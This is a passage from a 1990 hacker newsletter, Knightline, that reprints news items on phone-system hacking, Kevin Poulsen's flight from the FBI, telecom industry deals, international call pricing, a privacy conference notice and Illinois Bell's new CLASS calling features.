  5439. imperfections:  "It may be of interest to you to know, if I wanted to have
  5440. "fun," "evil" deeds could be done by remote control, up to and including
  5441. shutting down every ESS (electronic switching station) office in North America.
  5442.  
  5443.      "Less evil and more fun might be to shut down the stock market for a day,
  5444. scramble all transactions, or even send it down in a tail spin!  Banks aren't
  5445. immune either.  This may sound very darkside, but people must have what is
  5446. needed to fight back if things go bad!" Not disturbing enough?  Try this one on
  5447. for size:  Back in July of '89, I wrote of a story in the premier issue of the
  5448. magazine Mondo 2000 that detailed how one might set about hacking automatic
  5449. teller machines (ATMs).  That story contained everything but the blueprints for
  5450. the device, which the magazine's editors didn't print because they thought it
  5451. would be irresponsible to do so.  But now, a student-owned Cornell University
  5452. publication called "Visions Magazine" - for which Carl Sagan is creative
  5453. adviser - has asked the article's author, Morgan Russell, for rights to reprint
  5454. the article in its entirety, including device blueprints.
  5455.  
  5456.      These kinds of stories are disturbing, yet somehow I've always expected
  5457. they would happen, a reaction that's similar to the way I feel when I watch
  5458. "The Prisoner." No.  6, as he's called, cries out at the beginning of every
  5459. episode, "I am not a number!  I am a free man!" His will to resist is
  5460. sufficient to fend off the authorities who believe their need for the
  5461. "een-formation" in No.  6's head gives them the right to try to control his
  5462. movements and thoughts, using - of course - only the most impressive
  5463. technology.
  5464.  
  5465.      Of course, the science-fiction fantasy of impressive technology in the
  5466. '60s, when "The Prisoner" was created, was as authoritarian and centralized as
  5467. the governments using it.  Not many faceless authorities back then were
  5468. predicting a near-future where all classes of people had access to, could
  5469. afford and knew how to use powerful technology.  (I'm sure it would have ruined
  5470. their supper if they had.) Neither did they envision today's growing class of
  5471. technological sophisticates - whether self-taught PC hackers or trained
  5472. computer scientists - who, by virtue of their knowledge, could cripple,
  5473. disable, or otherwise confound the system which spawned them.  Have any opinion
  5474. you'd like about the right or wrong of it.  Fact is, whether it's the phone
  5475. network or a bank teller machine, the more we rely on technology, the less we
  5476. can rely on technology.
  5477.  
  5478.      Though this fact can make life unpleasant for those of us who are
  5479. victimized by either the machines we trust or the people who know how to fidget
  5480. with them, there is something strangely comforting about knowing that, after
  5481. all, a computer is still only as trustworthy as the humans who run it.  Write
  5482.  
  5483. CONTACT:
  5484. Denise Caruso, Spectra, San Francisco Examiner
  5485. P.O  Box 7260
  5486. San Francisco, CA 94120.   (Denise
  5487.  
  5488. MCI Mail (Denise Caruso) - CompuServe (73037,52) - CONNECT (Caruso)
  5489. _______________________________________________________________________________
  5490.  
  5491. HEADLINE  US Sprint to Supply Soviet Venture With Switches
  5492. DATE      09/17/90
  5493. SOURCE    WALL STREET JOURNAL (WJ)
  5494.  
  5495.  
  5496. WASHINGTON -- US Sprint Communications Corp.  said it obtained U.S.  government
  5497. approval to supply a Soviet joint venture with packet switches that can greatly
  5498. improve telecommunications services between the Soviet Union and other
  5499. countries.  The imminent shipment of these switches was announced by William
  5500. Esrey, chairman and chief executive officer of United Telecommunications Inc.,
  5501. shortly after completing a visit to the Soviet Union with Commerce Secretary
  5502. Robert Mosbacher and the chief executives of other U.S.  companies.  United
  5503. Telecommunications is the parent of US Sprint.
  5504.  
  5505.       The export license that US Sprint expects to obtain as early as this week
  5506. will be the first license for telecommunications equipment granted by the U.S.
  5507. under the new, relaxed regulations for shipping technology to the Soviet Union,
  5508. Esrey said.  * The Soviet venture, Telenet USSR, will be owned by a US Sprint
  5509. subsidiary, Sprint International, and the Soviet Ministry of Post and
  5510. Telecommunications and the Larvian Academy of Sciences, a Soviet research
  5511. group.  The Commerce Department doesn't discuss details of individual license
  5512. applications, but Mosbacher has publicly supported technology tie-ups between
  5513. the U.S.  companies represented in his traveling group and potential Soviet
  5514. partners.  US Sprint appears to be leading the race among American
  5515. telecommunications companies to establish solid ties in the Soviet Union.  An
  5516. earlier proposal by U S West Inc.  to lay down part of an international
  5517. fiber-optic line across the Soviet Union was rejected by U.S.  authorities
  5518. because of the advanced nature of the technology.
  5519.  
  5520.      US Sprint's packet switches, however, appear to be within the new
  5521. standards for permissible exports to the Soviet Union.  The switches are used
  5522. to route telephone calls and control traffic in voice, facsimile and
  5523. digitalized data transmission.  These eight-bit switches are one or two
  5524. generations behind the comparable systems in use in Western countries, but are
  5525. still good enough to sharply improve the ability of Sprint's Soviet customers
  5526. to communicate with other countries, Esrey's aides said.  The company declined
  5527. to discuss the value of its investment or to disclose how many switches will be
  5528. sold.  US Sprint said its venture will operate through new, dedicated satellite
  5529. lines that will augment the often-congested 32 international lines that
  5530. currently exist for Moscow-based businesses.  Esrey said he expects the venture
  5531. to be in operation before the end of this year.
  5532. _______________________________________________________________________________
  5533.  
  5534. HEADLINE  BT Tymnet Introduces Additional XLINK Services
  5535. DATE      09/09/90
  5536. SOURCE    DOW JONES NEWS WIRE
  5537.  
  5538. SAN JOSE, Calif.  -DJ- BT Tymnet Inc.  said XLINK Express, a family of new,
  5539. bundled, port-based, synchronous X.25 (XLINKs) services, is available.  The
  5540. XLINK service offers customers lower cost X.25 host access to its TYMNET
  5541. network, the company said in a news release.  XLINKs are leased-line private
  5542. access port services for X.25 interfaces at speeds up to 19.2 bits per second
  5543. and supporting up to 64 virtual circuits.
  5544.  
  5545. XLINK Express includes port access, leased line, modems, software, and free
  5546. data transmission.  Prior to XLINK Express, customers requiring a
  5547. 9.6-bit-per-second leased line for standard X.25 host connectivity would
  5548. typically pay about $1,500 monthly for their leased line, modems and interface.
  5549. With XLINK, customers can now be charged a monthly rate of $900, the company
  5550. said.
  5551.  
  5552. BT Tymnet Inc.  is a unit of British Telecom plc.
  5553. _______________________________________________________________________________
  5554.  
  5555. HEADLINE  Hacker may be taunting the FBI; Whiz suspected of invading U.S. army
  5556.           computer
  5557.           Credit:   PENINSULA TIMES TRIBUNE
  5558. DATE      04/10/90
  5559. SOURCE    Montreal Gazette   (GAZ)
  5560.           Edition:  FINAL
  5561.           Section:  NEWS
  5562.           Page:     F16
  5563.           Origin:   PALO ALTO, Calif.
  5564.           (Copyright The Gazette)
  5565.  
  5566.           --- Hacker may be taunting the FBI; Whiz suspected of invading
  5567.                                    U.S. army computer                       ---
  5568.  
  5569. PALO ALTO, Calif.  - The computer prodigy wanted on suspicion of invading a
  5570. U.S.  army computer may be taunting FBI agents by defiantly talking to his
  5571. hacker buddies on electronic bulletin boards while he eludes a manhunt,
  5572. authorities said.  The mysterious Kevin Poulsen, a former Menlo Park, Calif.,
  5573. resident described by many as a computer genius, is outsmarting the FBI and
  5574. apparently has the savvy to make this game of hide-and-seek a long contest.
  5575.  
  5576.      No, investigators are not getting frustrated, FBI official Duke Diedrich
  5577. said.  "It's just a matter of time.  We've got our traps and hopefully one day
  5578. we'll be able to get the mouse." Authorities have issued an arrest warrant for
  5579. the former SRI International computer expert.  He has been at large since at
  5580. least Jan.  18, when federal officials revealed allegations of a sensational
  5581. computer conspiracy.  The FBI says Poulsen, 24, is the mastermind of a complex
  5582. computer and telephone-system invasion that included breaking into an
  5583. unclassified army computer network, snooping on the FBI and eavesdropping on
  5584. the calls of a former girlfriend.  FBI agents believe he may be in southern
  5585. California, but because he is apparently still hooked up to a national network
  5586. of hackers, he could be using his friends to hide just about anywhere, Diedrich
  5587. said.  Poulsen is adept at manufacturing false identification and knows how to
  5588. use the phone system to cover traces of his calls.
  5589.  
  5590.      Agents believe his hacker talk on electronic bulletin boards is perhaps "a
  5591. way of taunting law enforcement officials," Diedrich said.  Poulsen may be back
  5592. to his old tricks, but "he's not hiding with the usual bunch of hackers," said
  5593. John Maxfield, a computer security consultant and former FBI informant.
  5594.  
  5595.      Maxfield, known nationally as a "narc" among young hackers, said he had
  5596. underground sources who said Poulsen was rumored to be living alone in a
  5597. southern California apartment.  Poulsen's computer chatter could lead to his
  5598. downfall, Maxfield said.  Many hackers are electronic anarchists who would be
  5599. happy to turn in a high-ranking hacker, thereby pushing themselves up the
  5600. status ladder, he said.  But Poulsen probably has access to a steady flow of
  5601. cash, so he doesn't have to get a job that might lead to his arrest, Maxfield
  5602. said.
  5603.  
  5604.      With his expertise, Poulsen could easily crack the bank computers that
  5605. validate cash transactions and then credit his own accounts, Maxfield said.
  5606. The FBI isn't desperate, but agents have contacted America's Most Wanted, a
  5607. television show that asks viewers to help authorities find fugitives.
  5608.  
  5609.      Poulsen's mother, Bernadine, said her son called home just after police
  5610. announced there was a warrant for his arrest, but he had not called since.
  5611. During the brief call, "He just apologized for all the stress he was causing
  5612. us." The fugitive's motivation baffles Maxfield.
  5613.  
  5614.      The self-described "hacker tracker" has conducted investigations that have
  5615. led to dozens of arrests, but the Poulsen-contrived conspiracy as alleged by
  5616. the FBI is strange, he said.  Most teen-age hackers are thrill seekers, he
  5617. explained.  The more dangerous the scam, the bigger the high.  But Poulsen is
  5618. 24.  "Why is he still doing it?" Maxfield asked.
  5619.  
  5620.      Poulsen, alias "Dark Dante" and "Master of Impact," was a member of an
  5621. elite hacker gang called Legion of Doom.  [Poulsen was never a member of the
  5622. group -DH]
  5623.  
  5624. The 25 or so mischievous members are now being arrested one by one, Maxfield
  5625. said.  They consider themselves misfits, but smart misfits who are superior to
  5626. the masses of average people who have so labelled them, he said.  [Baha,
  5627. Maxfield really cracks me up  -DH]
  5628.  
  5629. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  5630.  
  5631.      Kevin recently had a 15 minute television debut on NBC's "Unsolved
  5632. Mystries".  The program showed renactments of Kevin breaking into CO's and
  5633. walking around his apartment filled with computers and other 'listening'
  5634. devices (as the show called them).
  5635.  
  5636.      I personally got a kick out of the photographs he took of himself holding
  5637. switching equipment after a break-in at a CO.
  5638. _______________________________________________________________________________
  5639.  
  5640. HEADLINE  Amtrak Gets Aboard SDN
  5641.           Byline:   BETH SCHULTZ
  5642. DATE      10/25/90
  5643. SOURCE    COMMUNICATIONS WEEK
  5644.           Issue:    267
  5645.           Section:  PN
  5646.           Page:     58
  5647.           (Copyright 1989 CMP Publications, Inc.  All rights reserved.)
  5648.  
  5649. WASHINGTON - Amtrak, always looking for ways to reduce the amount of government
  5650. funding it takes to keep it on track, has switched its long distance traffic
  5651. onto a virtual private network-taking advantage of an AT&T promotion that saved
  5652. the railroad $250,000.  Though Amtrak realized the cost-savings potential of
  5653. AT&T's Software Defined Network (SDN) as early as May 1987, it took until last
  5654. spring for the company to move full-speed ahead with implementation of that
  5655. virtual private network service.  "We had led the horse to water, but we
  5656. couldn't make it drink," said Jim West, an AT&T national systems consultant.
  5657.  
  5658.      But in April of this year, AT&T removed the last obstacle in the
  5659. railroad's way, said Amtrak's chief network engineer Matt Brunk.  At that time,
  5660. AT&T began running a special promotion that waived the installation fee for
  5661. connecting sites to the SDN.  Until then, Amtrak, based here, could only afford
  5662. adding locations piecemeal.
  5663.  
  5664.      Plagued by network abuse, Amtrak began tracking the potential of SDN as a
  5665. means of solving that problem as soon as AT&T announced its SDN rates in
  5666. December 1986.  Describing the severity of its toll-fraud problem, Brunk told
  5667. of a seven-day stint in 1985 during which hackers tallied $185,000 in
  5668. unauthorized charges.  By the end of that year, toll fraud on Amtrak's network
  5669. reached in excess of $1 million.
  5670.  
  5671.      Before the days of the virtual private network, the only way to clean up
  5672. this abuse was through a toll-free "800" service configuration and PBX remote
  5673. access, which Amtrak implemented at the end of 1985.  "We changed the policy
  5674. and procedures for all users, limiting the capabilities of remotaccess," Brunk
  5675. said.
  5676.  
  5677.      But Amtrak needed to further patrol its network, and after studying AT&T's
  5678. SDN, as well as competitive offerings, the railroad ordered in May 1987 the
  5679. first portion of what would this year become a 300-site SDN.  The initial order
  5680. included AT&T Accunet T1.5 circuits for just two stations, one in Chicago and
  5681. one here.  Used to replace the 800 service, these 1.544-megabit-per-second
  5682. direct connections were used to "provide secure remote access to on-net numbers
  5683. for numerous users," Brunk said.
  5684.  
  5685.      Equally important, Amtrak also signed up for the Network Remote Access
  5686. Fraud Control feature, which gives it a single point of control over the
  5687. network.  "What Amtrak ordered then was not really a network, because it was
  5688. feature-specific," said AT&T national account manager Sharon Juergens.
  5689.  
  5690.      The company has not billed back or dropped any toll fraud since it began
  5691. using the SDN remote access feature, Brunk said.  "Anyone with PBX
  5692. remote-access capability and :heavy!  volume not using SDN as a vehicle is
  5693. doing their company a disservice."
  5694.  
  5695.      Originally a beta-test site for the SDN's security-report feature, Amtrak
  5696. has since come to rely heavily on that option, too.  With the exception of some
  5697. group codes, a warning is sent if spending on any user code exceeds $60 per
  5698. month.  "We begin investigating immediately," Brunk said.  "We are now
  5699. proactive, instead of reactive."
  5700.  
  5701.      Today, 40 Amtrak locations have switched-access connections to the SDN;
  5702. 260 sites are linked through dedicated means, whether through voice-grade
  5703. analog circuits or high-speed T1s.  "The users' traffic is discounted, on a
  5704. single billing statement, and in effect, :the SDN!  links them to the company.
  5705. This is our corporate communications glue," Brunk said.  "But this is only the
  5706. beginning.  Not only have we provided a service, but also we have provided a
  5707. bright future.  We have set ourselves up for competitive gain." Spending
  5708. Stabilized And the company has stabilized telecommunications expenditures.  In
  5709. 1985, Amtrak spent $26 million on telecom equipment and services.  Four years
  5710. later, Brunk estimated the railroad will spend just $1 million more.  He said
  5711. contributing factors to this will be the SDN, upgrading from outdated analog
  5712. PBXs to digital PBXs and replacing some PBX installations with local
  5713. Bell-provided centrex service.  Network savings resulting from reduced
  5714. call-setup time alone, Brunk added, will reach $74,000 this year.
  5715.  
  5716.      "In a nutshell, we have improved transmission quality, network management
  5717. and maintenance, and reduced costs," Brunk said.  "The users have gained a
  5718. single authorization code accessing multiple applications, improved quality and
  5719. support."
  5720.  
  5721.      Cost savings aside, Amtrak also took into consideration applications
  5722. available off the SDN.  "At the time, of what was available, we really liked
  5723. everything about SDN," Brunk said.
  5724.  
  5725.      The Amtrak network is supported by the dedicated access trunk testing
  5726. system.  This system lets Amtrak test access lines, thus aiding the company in
  5727. activating and deactivating authorization codes.  And Amtrak is testing the
  5728. AT&T Alliance dedicated teleconferencing service.
  5729.  
  5730.      With the teleconferencing service, Amtrak can reduce internal travel
  5731. expenditures:  Users can access the system remotely via an 800 number, or on
  5732. demand.  Amtrak operators can connect teleconferencing calls at any time.  "The
  5733. quality is fantastic, but the cost is even better because it's all connected to
  5734. the SDN," said Brunk.
  5735.  
  5736. _______________________________________________________________________________
  5737.  
  5738.  
  5739.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  5740.  
  5741.                               K N I G H T L I N E
  5742.  
  5743.                             Issue 01/Part II of III
  5744.  
  5745.                             17th of November, 1990
  5746.  
  5747.                               Written, compiled,
  5748.  
  5749.                            and edited by Doc Holiday
  5750.  
  5751.                         KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
  5752.  
  5753.                                       ---
  5754.                            F R O M   T H E   W I R E
  5755. _______________________________________________________________________________
  5756.  
  5757. HEADLINE  ADAPTING DIGITAL SWITCH -- Fujitsu To Expand In U.S.
  5758.           Byline:   ROBERT POE
  5759. DATE      11/15/90
  5760. SOURCE    COMMUNICATIONSWEEK   (CWK)
  5761.           Issue:    322
  5762.           Section:  PUBLIC NETWORKING
  5763.           Page:     33
  5764.           (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
  5765.  
  5766. RALEIGH, N.C.-Fujitsu Ltd.  is boosting efforts to adapt its digital exchange
  5767. to the U.S.  network, in anticipation of the $40 billion public switch
  5768. changeout expected in the United States over the next 10 to 15 years.
  5769.  
  5770. Fujitsu plans to increase the number of U.S.  staff members in charge of
  5771. selling and engineering the Fetex-150 switch to 600 by 1994 from the current
  5772. 100, officials at the Tokyo-based company said.
  5773.  
  5774. The increase will shift development of sophisticated switch features from Japan
  5775. to the United States, said one observer familiar with Fujitsu Network Switching
  5776. of America Inc., based here.
  5777.  
  5778. FILLING U.S. NEEDS
  5779.  
  5780. Most of the current staff there is working on testing the performance and
  5781. network conformance of software developed in Japan, the observer said.  With
  5782. the expansion, the subsidiary will be responsible for developing functions and
  5783. capabilities required by U.S.  customers.
  5784.  
  5785. The Fetex-150 is Fujitsu's export-model exchange switch, with more than 8.8
  5786. million lines installed or on order in 17 countries.  None have been sold in
  5787. the United States, but the recently announced plans confirm longstanding
  5788. speculation that the Japanese manufacturer is planning a major push into the
  5789. U.S.
  5790.  
  5791. When Fujitsu won a major switch tender in Singapore last autumn, competitors
  5792. complained it was selling the equipment at cost to win a prestigious contract
  5793. that would serve as a stepping-stone to the United States.
  5794.  
  5795. WOOING THE BELLS
  5796.  
  5797. Fujitsu said its switch has passed Phase 1 and Phase 2 evaluations by Bell
  5798. Communications Research Inc., Livingston, N.J., the research arm of the seven
  5799. U.S.  regional Bell companies.  Although the Bellcore certification is
  5800. considered essential to selling to the Bells-which account for about 75 percent
  5801. of U.S.  telephone lines-it may not be enough for the company to break into a
  5802. market dominated by AT&T and Nashville, Tenn.-based Northern Telecom Inc.
  5803.  
  5804. Those two manufacturers have more than 90 percent of the U.S.  market.  A share
  5805. like that, coupled with Bell company inertia in changing to new suppliers,
  5806. leaves foreign public switch manufacturers largely out in the cold, analysts
  5807. said.
  5808.  
  5809. The U.S.  subsidiaries of Siemens AG, L.M.  Ericsson Telephone Co., NEC Corp.
  5810. and GEC Plessey Telecommunications Ltd.  have found the U.S.  market tough to
  5811. crack, though each has had limited success and is further along than Fujitsu.
  5812.  
  5813. `INHERENT CONSERVATISM'
  5814.  
  5815. "There's an inherent conservatism on the part of their {U.S.} customer base,"
  5816. said Robert Rosenberg, director of analytical services at The Eastern
  5817. Management Group, Parsippany, N.J.  "These are huge companies with billions of
  5818. dollars invested in their current equipment.
  5819.  
  5820. "Even if Fujitsu comes up with a switch that has all the bells and whistles
  5821. that an engineer could ever want, if all the support systems have to be rebuilt
  5822. in order to fit that switch into the network, his manager won't let him install
  5823. it," Rosenberg said.
  5824.  
  5825.  
  5826.  
  5827. _______________________________________________________________________________
  5828.  
  5829.  
  5830. Telephone Services:  A Growing Form Of "Foreign Aid"
  5831.  
  5832. Keith Bradsher, {The New York Times}, Sunday, October 21, 1990
  5833.                 (Business section, page 5)
  5834.  
  5835.  Americans who make international telephone calls are paying extra to
  5836. subsidize foreign countries' postal rates, local phone service, even
  5837. schools and armies.
  5838.  
  5839.  These subsidies are included in quarterly payments that American
  5840. telephone companies must make to their counterparts overseas, most of
  5841. these are state-owned monopolies.  The net payments, totaling $2.4
  5842. billion last year, form one of the fastest-growing pieces of the
  5843. American trade deficit, and prompted the Federal communications
  5844. Commission this summer to begin an effort that could push down the
  5845. price that consumers pay for an international phone call by up to 50
  5846. percent within three years.
  5847.  
  5848.  The imbalance is a largely unforeseen side effect of the growth of
  5849. competition in the American long-distance industry during the 1980's.
  5850. The competition drove down outbound rates from the United States,
  5851. while overseas monopolies kept their rates high.
  5852.  
  5853.  The result is that business and families spread among countries try
  5854. to make sure that calls originate in the United States.  Outbound
  5855. calls from the United States now outnumber inbound calls by 1.7-to-1,
  5856. in minutes -- meaning American phone companies have to pay fees for
  5857. the surplus calls.  The F.C.C. is concerned that foreign companies are
  5858. demanding much more money than is justified, given the steeply falling
  5859. costs of providing service, and proposes to limit unilaterally the
  5860. payments American carriers make.
  5861.  
  5862.  Central and South American countries filed formal protests against
  5863. the F.C.C.'s plan on October 12.  Although developed countries like
  5864. Britain and Japan account for more than half of United States
  5865. international telephone traffic, some of the largest imbalances in
  5866. traffic are with developing countries, which spend the foreign
  5867. exchange on everything from school systems to weapons.  The deficit
  5868. with Columbia, for example, soared to $71 million last year.
  5869.  
  5870.  International charges are based on formulas assigning per-minute
  5871. costs of receiving and overseas call and routing it within the home
  5872. country.  But while actual costs have dropped in recent years, the
  5873. formulas have been very slow to adjust, if they are adjusted at all.
  5874. For example, while few international calls require operators, the
  5875. formulas are still based on such expenses.
  5876.  
  5877.  Furthermore, the investment required for each telephone line in an
  5878. undersea cable or aboard a satellite has plummeted with technological
  5879. advances.  A trans-Pacific cable with 600,000 lines, announced last
  5880. Wednesday and scheduled to go into service in 1996, could cost less
  5881. than $1,000 per line.
  5882.  
  5883.  Yet the phone company formulas keep charges high.  Germany's Deutsche
  5884. Bundespost, for example, currently collects 87 cents a minute from
  5885. American carriers, which actually lose money on some of the off-peak
  5886. rates they offer American consumers.
  5887.  
  5888. MORE CALLS FROM THE U.S. ARE GENERATING A GROWING TRADE DEFICIT
  5889.  
  5890. U.S. telephone companies charge less for      1980   0.3   (billions of
  5891. overseas calls than foreign companies         1981   0.5    U.S. dollars)
  5892. charge for calls the United States.  So       1982   0.7
  5893. more international calls originate in the     1983   1.0
  5894. United States.  But the U.S. companies pay    1984   1.2
  5895. high fees to their foreign counterparts for   1985   1.1
  5896. handling those extra calls, and the deficit   1986   1.4
  5897. has ballooned in the last decade.             1987   1.7
  5898.                                               1988   2.0
  5899.                                               1989   2.4 (estimate)
  5900. (Source: F.C.C.)
  5901.  
  5902. THE LONG DISTANCE USAGE IMBALANCE
  5903.  
  5904. Outgoing and incoming U.S. telephone traffic, in 1988, the latest year
  5905. for which figures are available, in percent.
  5906.  
  5907. Whom are we calling?              Who's calling us?
  5908. Total outgoing traffic:           Total incoming traffic:
  5909. 5,325 million minutes             3,155 million minutes
  5910.  
  5911.   Other:      47.9%                  Other:      32.9%
  5912.   Canada:     20.2%                  Canada:     35.2%
  5913.   Britain:     9.1%                  Britain:    12.6%
  5914.   Mexico:      8.8%                  Mexico:      6.2%
  5915.   W. Germany:  6.9%                  W. Germany:  5.4%
  5916.   Japan:       4.4%                  Japan:       4.3%
  5917.   France:      2.7%                  France:      3.4%
  5918.  
  5919. (Source:  International Institute of Communications)
  5920.  
  5921. COMPARING COSTS:  Price range of five-minute international calls between
  5922. the U.S. and other nations.  Figures do not include volume discounts.
  5923.  
  5924. Country            From U.S.*          To U.S.
  5925.  
  5926. Britain            $2.95 to $5.20      $4.63 to $6.58
  5927. Canada (NYC to     $0.90 to $2.25      $1.35 to $2.26
  5928.   Montreal)
  5929. France             $3.10 to $5.95      $4.72 to $7.73
  5930. Japan              $4.00 to $8.01      $4.67 to $8.34
  5931. Mexico (NYC to     $4.50 to $7.41      $4.24 to $6.36
  5932.   Mexico City)
  5933. West Germany       $3.10 to $6.13      $10.22
  5934.  
  5935. * For lowest rates, callers pay a monthly $3 fee.
  5936. (Source: A.T.&T.)
  5937.  
  5938. WHERE THE DEFICIT FALLS: Leading nations with which the United States
  5939. has a trade deficit in telephone services, in 1989, in millions of
  5940. dollars.
  5941.  
  5942. Mexico:               $534
  5943. W. Germany:            167
  5944. Philippines:           115
  5945. South Korea:           112
  5946. Japan:                  79
  5947. Dominican Republic:     75
  5948. Columbia:               71
  5949. Italy:                  70       (Source: F.C.C.)
  5950. Israel:                 57
  5951. Britain:                46
  5952.  
  5953. THE RUSH TOWARD LOWER COSTS: The cost per telephone line for laying
  5954. each of the eight telephone cables that now span the Atlantic Ocean,
  5955. from the one in 1956, which held 48 lines, to the planned 1992 cable
  5956. which is expected to carry 80,000 lines.  In current dollars.
  5957.  
  5958. 1956       $557,000
  5959. 1959        436,000
  5960. 1963        289,000
  5961. 1965        365,000
  5962. 1970         49,000
  5963. 1976         25,000
  5964. 1983         23,000               (Source, F.C.C.)
  5965. 1988          9,000
  5966. 1992          5,400  (estimate)
  5967.  
  5968.  
  5969.  
  5970. _______________________________________________________________________________
  5971.  
  5972. A few notes from Jim Warren in regards to the CFP conference:
  5973.  
  5974.  
  5975. Greetings,
  5976.   Some key issues are now settled, with some minor remain for resolution.
  5977.  
  5978. CONFERENCE DATES, LOCATION & MAXIMUM SIZE
  5979.  
  5980. We have finally completed site selection and contracted for the Conference
  5981. facility.  Please mark your calendars and spread the word:
  5982.  
  5983.                First Conference on Computers, Freedom & Privacy
  5984.                        March 25-28,1991, Monday-Thursday
  5985.                      SFO Marriott, Burlingame, California
  5986.               (just south of San Francisco International Airport;
  5987.        on the San Francisco Peninsula, about 20 minutes from "The City")
  5988.                             maximum attendance: 600
  5989.  
  5990. PLEASE NOTE NAME CHANGE
  5991.  
  5992. We have found *ample* issues for a very robust Conference, limited only to
  5993. computer-related issues of responsible freedom and privacy.  After questions
  5994. regarding satellite surveillance, genetic engineering, photo traffic radar,
  5995. wireless phone bugs, etc., we decided to modify the Conference title for
  5996. greater accuracy.  We have changed it from "Technology, Freedom & Privacy" to
  5997. "Computers, Freedom & Privacy."
  5998.  
  5999. ONE MORE NIT TO PICK
  6000.  
  6001. Until recently, our draft title has included, "First International Conference".
  6002.  
  6003. We most definitely are planning for international participation, especially
  6004. expecting presentations from EEC and Canadian privacy and access agencies.
  6005. These will soon have significant impacts on trans-border dataflow and inter-
  6006. national business communications.
  6007.  
  6008. However, we were just told that some agencies require multi-month clearance
  6009. procedures for staff attending any event with "International" in its title.
  6010.  
  6011. **Your input on this and the minor issue of whether to include "International"
  6012. in our Conference title would be appreciated.**
  6013.  
  6014. ATTRIBUTION (BLAME)
  6015.  
  6016. We are building the first bridge connecting the major, highly diverse villages
  6017. of our new electronic frontier.  Such construction involves some degree of
  6018. exploration and learning.
  6019.  
  6020. These title-changes are a result of that learning process.  Please attribute
  6021. all responsibility for the fluctuating Conference title to me, personally.  I
  6022. am the one who proposed the first title; I am the one who has changed it to
  6023. enhance accuracy and avoid conflict.
  6024.  
  6025. Of course, the title will be settled and finalized (with your kind assistance)
  6026. before the Conference is formally announced and publicity statements issued --
  6027. soon!
  6028.  
  6029. Thanking you for your interest and continued assistance, I remain, Sincerely,
  6030.  
  6031.                                                  --Jim Warren, CFP Conf Chair
  6032.                                                         jwarren@well.ca.sf.us
  6033.  
  6034. _______________________________________________________________________________
  6035.  
  6036. [Reprented from TELECOM digest. --DH]
  6037.  
  6038.  
  6039.                  FROM: Patrick Townson <telecom@eecs.nwu.edu>
  6040.                     SUBJECT: Illinois Bell Shows Real CLASS
  6041.  
  6042.      For several months now, Illinois Bell has been hawking CLASS.  Brochures
  6043. in the mail with our bills and newspaper advertisements have told us about the
  6044. wonderful new services soon to be offered.
  6045.  
  6046. It was just a question, they said, of waiting until your central office had
  6047. been converted.  The new features being offered are:
  6048.  
  6049.  *66  Auto Call Back:  Call back the last number which called you. No
  6050.                        need to know the number.
  6051.  
  6052.  *69  Repeat Dial:     If the number you dialed was busy, punching
  6053.                        this will keep trying the number for up to
  6054.                        30 minutes, and advise you when it can connect.
  6055.  
  6056.  *60  Call Screening   Enter:
  6057.                        # plus number to be screened out plus #
  6058.                        * plus number to be re-admitted  plus *
  6059.                        # plus 01 plus # to add the number of the
  6060.                          last call you received, whether or not
  6061.                          you know the number.
  6062.                        1 To play a list of the numbers being screened.
  6063.                        0 For a helpful recording of options, etc.
  6064.  
  6065. Distinctive Ringing    Up to ten numbers can be programmed in. When a
  6066.                        call is received from one of these numbers, your
  6067.                        phone will give a special ring to advise you.
  6068.  
  6069. Multi-Ring Service     Two additional numbers can be associated with
  6070.                        your number. When someone dials one of these
  6071.                        two numbers, your phone will give a special ring.
  6072.  
  6073. With both Distinctive Ringing and Multi-Ring Service, if you have Call Waiting,
  6074. the Call Waiting tones will be different from the norm also, so that you can
  6075. tell what is happening.  With Multi-Ring Service, you can have it programmed so
  6076. the supplementary numbers associated with your main number are forwarded when
  6077. it is forwarded, or do not observe forwarding, and 'ring through' despite what
  6078. the main number is doing.
  6079.  
  6080. Alternate Answer       Can be programmed so that after 3-7 rings,
  6081.                        the unanswered call will be automatically sent
  6082.                        to another line *WITHIN YOUR CENTRAL OFFICE*.
  6083.  
  6084.                        If the number assigned as an alternate is
  6085.                        itself busy or forwarded OUTSIDE YOUR OFFICE
  6086.                        then Alternate Answer will not forward the
  6087.                        call and continue to ring unanswered.
  6088.  
  6089. Transfer on Busy/      This is just another name for 'hunt'. The
  6090.         No Answer      difference is that hunt is free; Transfer on
  6091.                        Busy/NA  costs a couple bucks per month. Like
  6092.                        Alternate Answer, it must forward only to a
  6093.                        number on the same switch. Unlike hunt, it
  6094.                        will work on NA as well. Unlike Alternate
  6095.                        Answer, it works on busy as well.
  6096.  
  6097. Caller*ID will be available 'eventually' they say.
  6098.  
  6099. Now my story begins:
  6100.  
  6101.      From early this summer to the present, I've waited patiently for CLASS to
  6102. be available in Chicago-Rogers Park.  Finally a date was announced:  October 15
  6103. the above features would be available.  In mid-September, I spoke with a rep in
  6104. the Irving-Kildare Business Office.  She assured me *all* the above features
  6105. would be available on October 15.  My bill is cut on the 13th of each month,
  6106. and knowing the nightmare of reading a bill which has had changes made in
  6107. mid-month (page after page of pro-rata entries for credits on the old service,
  6108. item by item; pro-rata entries for the new service going in, etc) it made sense
  6109. to implement changes on the billing date, to keep the statement simple.
  6110.  
  6111.      She couldn't write the order for the service to start October 13, since
  6112. CLASS was not officially available until the fifteenth.  Well, okay, so its
  6113. either wait until November 13 or go ahead and start in mid-month, worrying
  6114. about reading the bill once it actually arrives.
  6115.  
  6116.      I've been ambivilent about CLASS since it is not compatible with my
  6117. present service 'Starline', but after much thought -- and since all
  6118. installation and order-writing on Custom Calling features is free now through
  6119. December 31!  -- I decided to try out the new stuff.
  6120.  
  6121.      She took the order Wednesday afternoon and quoted 'sometime Thursday' for
  6122. the work to be done.  In fact it was done -- or mostly done -- by mid-afternoon
  6123. Thursday.  But I should have known better.  I should have remembered my
  6124. experience with Starline three years ago, when it took a technician in the
  6125. central office *one week* to get it all in and working correctly.  Still, I
  6126. took IBT's word for it.
  6127.  
  6128.      I got home about 5:30 PM Thursday.  *You know* I sat down right away at
  6129. the phone to begin testing the new features!  :) The lines were to be equipped
  6130. as follows:
  6131.  
  6132. Line 1:  Call Waiting                Line 2:  Call Forwarding
  6133.          Three Way Calling                    Speed Dial 8
  6134.          Call Forwarding                      Busy Repeat Dialing *69
  6135.          Speed Dial 8
  6136.          Auto Call Back  *66         (second line used mostly by modem;
  6137.          Busy Repeat Dialing *69      so Call Waiting undesirable)
  6138.          Call Screening *60
